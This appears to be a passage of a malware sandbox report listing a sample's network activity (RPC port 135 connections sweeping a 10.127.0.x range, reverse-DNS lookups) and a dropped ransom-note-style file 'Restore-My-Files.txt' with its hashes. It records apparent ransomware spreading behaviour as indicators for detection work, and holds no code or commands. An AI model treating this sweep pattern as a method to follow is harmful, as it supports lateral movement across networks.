N/A 10.127.0.184:135 tcp
N/A 10.127.0.237:135 tcp
N/A 10.127.0.183:135 tcp
N/A 10.127.0.236:135 tcp
N/A 10.127.0.216:135 tcp
N/A 10.127.0.251:135 tcp
N/A 10.127.0.163:135 tcp
N/A 10.127.0.162:135 tcp
N/A 10.127.0.161:135 tcp
N/A 10.127.0.160:135 tcp
N/A 10.127.0.159:135 tcp
N/A 10.127.0.157:135 tcp
N/A 10.127.0.158:135 tcp
N/A 10.127.0.155:135 tcp
N/A 10.127.0.156:135 tcp
N/A 10.127.0.154:135 tcp
N/A 10.127.0.153:135 tcp
N/A 10.127.0.152:135 tcp
N/A 10.127.0.151:135 tcp
N/A 10.127.0.150:135 tcp
N/A 10.127.0.149:135 tcp
N/A 10.127.0.148:135 tcp
N/A 10.127.0.147:135 tcp
N/A 10.127.0.145:135 tcp
N/A 10.127.0.146:135 tcp
N/A 10.127.0.143:135 tcp
N/A 10.127.0.144:135 tcp
N/A 10.127.0.142:135 tcp
N/A 10.127.0.141:135 tcp
N/A 10.127.0.139:135 tcp
N/A 10.127.0.140:135 tcp
N/A 10.127.0.137:135 tcp
N/A 10.127.0.138:135 tcp
N/A 10.127.0.136:135 tcp
N/A 10.127.0.134:135 tcp
N/A 10.127.0.135:135 tcp
N/A 10.127.0.109:135 tcp
N/A 10.127.0.111:135 tcp
N/A 10.127.0.110:135 tcp
N/A 10.127.0.114:135 tcp
N/A 10.127.0.113:135 tcp
N/A 10.127.0.121:135 tcp
N/A 10.127.0.112:135 tcp
N/A 10.127.0.116:135 tcp
N/A 10.127.0.117:135 tcp
N/A 10.127.0.118:135 tcp
N/A 10.127.0.119:135 tcp
N/A 10.127.0.120:135 tcp
N/A 10.127.0.125:135 tcp
N/A 10.127.0.123:135 tcp
N/A 10.127.0.124:135 tcp
N/A 10.127.0.122:135 tcp
N/A 10.127.0.128:135 tcp
N/A 10.127.0.127:135 tcp
N/A 10.127.0.126:135 tcp
N/A 10.127.0.132:135 tcp
N/A 10.127.0.131:135 tcp
N/A 10.127.0.129:135 tcp
N/A 10.127.0.133:135 tcp
N/A 10.127.0.30:135 tcp
N/A 10.127.0.108:135 tcp
N/A 10.127.0.31:135 tcp
N/A 10.127.0.105:135 tcp
N/A 10.127.0.107:135 tcp
N/A 10.127.0.106:135 tcp
N/A 10.127.0.100:135 tcp
N/A 10.127.0.104:135 tcp
N/A 10.127.0.102:135 tcp
N/A 10.127.0.103:135 tcp
N/A 10.127.0.99:135 tcp
N/A 10.127.0.101:135 tcp
N/A 10.127.0.93:135 tcp
N/A 10.127.0.98:135 tcp
N/A 10.127.0.97:135 tcp
N/A 10.127.0.96:135 tcp
N/A 10.127.0.95:135 tcp
N/A 10.127.0.94:135 tcp
N/A 10.127.0.115:135 tcp
N/A 10.127.0.92:135 tcp
N/A 10.127.0.86:135 tcp
N/A 10.127.0.91:135 tcp
N/A 10.127.0.89:135 tcp
N/A 10.127.0.90:135 tcp
N/A 10.127.0.88:135 tcp
N/A 10.127.0.84:135 tcp
N/A 10.127.0.87:135 tcp
N/A 10.127.0.79:135 tcp
N/A 10.127.0.83:135 tcp
N/A 10.127.0.85:135 tcp
N/A 10.127.0.82:135 tcp
N/A 10.127.0.81:135 tcp
N/A 10.127.0.80:135 tcp
N/A 10.127.0.78:135 tcp
N/A 10.127.0.77:135 tcp
N/A 10.127.0.70:135 tcp
N/A 10.127.0.76:135 tcp
N/A 10.127.0.75:135 tcp
N/A 10.127.0.74:135 tcp
N/A 10.127.0.72:135 tcp
N/A 10.127.0.73:135 tcp
N/A 10.127.0.64:135 tcp
N/A 10.127.0.71:135 tcp
N/A 10.127.0.69:135 tcp
N/A 10.127.0.67:135 tcp
N/A 10.127.0.68:135 tcp
N/A 10.127.0.65:135 tcp
N/A 10.127.0.57:135 tcp
N/A 10.127.0.66:135 tcp
N/A 10.127.0.62:135 tcp
N/A 10.127.0.60:135 tcp
N/A 10.127.0.63:135 tcp
N/A 10.127.0.61:135 tcp
N/A 10.127.0.59:135 tcp
N/A 10.127.0.58:135 tcp
N/A 10.127.0.50:135 tcp
N/A 10.127.0.54:135 tcp
N/A 10.127.0.55:135 tcp
N/A 10.127.0.56:135 tcp
N/A 10.127.0.53:135 tcp
N/A 10.127.0.52:135 tcp
N/A 10.127.0.48:135 tcp
N/A 10.127.0.51:135 tcp
N/A 10.127.0.49:135 tcp
N/A 10.127.0.43:135 tcp
N/A 10.127.0.47:135 tcp
N/A 10.127.0.46:135 tcp
N/A 10.127.0.42:135 tcp
N/A 10.127.0.45:135 tcp
N/A 10.127.0.44:135 tcp
N/A 10.127.0.38:135 tcp
N/A 10.127.0.40:135 tcp
N/A 10.127.0.41:135 tcp
N/A 10.127.0.39:135 tcp
N/A 10.127.0.34:135 tcp
N/A 10.127.0.36:135 tcp
N/A 10.127.0.37:135 tcp
N/A 10.127.0.35:135 tcp
N/A 10.127.0.33:135 tcp
N/A 10.127.0.32:135 tcp
N/A 10.127.0.28:135 tcp
N/A 10.127.0.27:135 tcp
N/A 10.127.0.29:135 tcp
N/A 10.127.0.26:135 tcp
N/A 10.127.0.25:135 tcp
N/A 10.127.0.24:135 tcp
N/A 10.127.0.23:135 tcp
N/A 10.127.0.22:135 tcp
N/A 10.127.0.20:135 tcp
N/A 10.127.0.21:135 tcp
N/A 10.127.0.15:135 tcp
N/A 10.127.0.16:135 tcp
N/A 10.127.0.11:135 tcp
N/A 10.127.0.12:135 tcp
N/A 10.127.0.7:135 tcp
N/A 10.127.0.8:135 tcp
N/A 10.127.0.4:135 tcp
N/A 10.127.0.3:135 tcp
N/A 10.127.0.2:135 tcp
N/A 10.127.0.1:135 tcp
N/A 10.127.0.0:135 tcp
N/A 10.127.0.14:135 tcp
N/A 10.127.0.13:135 tcp
N/A 10.127.0.5:135 tcp
N/A 10.127.0.19:135 tcp
N/A 10.127.0.18:135 tcp
N/A 10.127.0.9:135 tcp
N/A 10.127.0.10:135 tcp
N/A 10.127.0.6:135 tcp
N/A 10.127.0.17:135 tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 202.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

C:\Program Files\dotnet\Restore-My-Files.txt

MD5 3362567d63f9a8fb242c0c11689eec22
SHA1 1de67effa9309a48ad233685501e566f49e642c6
SHA256 a52d0e74559e1d8068751d2661de4b058ae097b546a49e9842a3ce74a0d9a41b
SHA512 a2f7546dc25c4cca2d434829f0ef125e06e2f44f51d001421cc46848993e35ca2fb78dbe84ef13c545773e5643403d1c600ba17a515d8f9092df1c66ff0f2794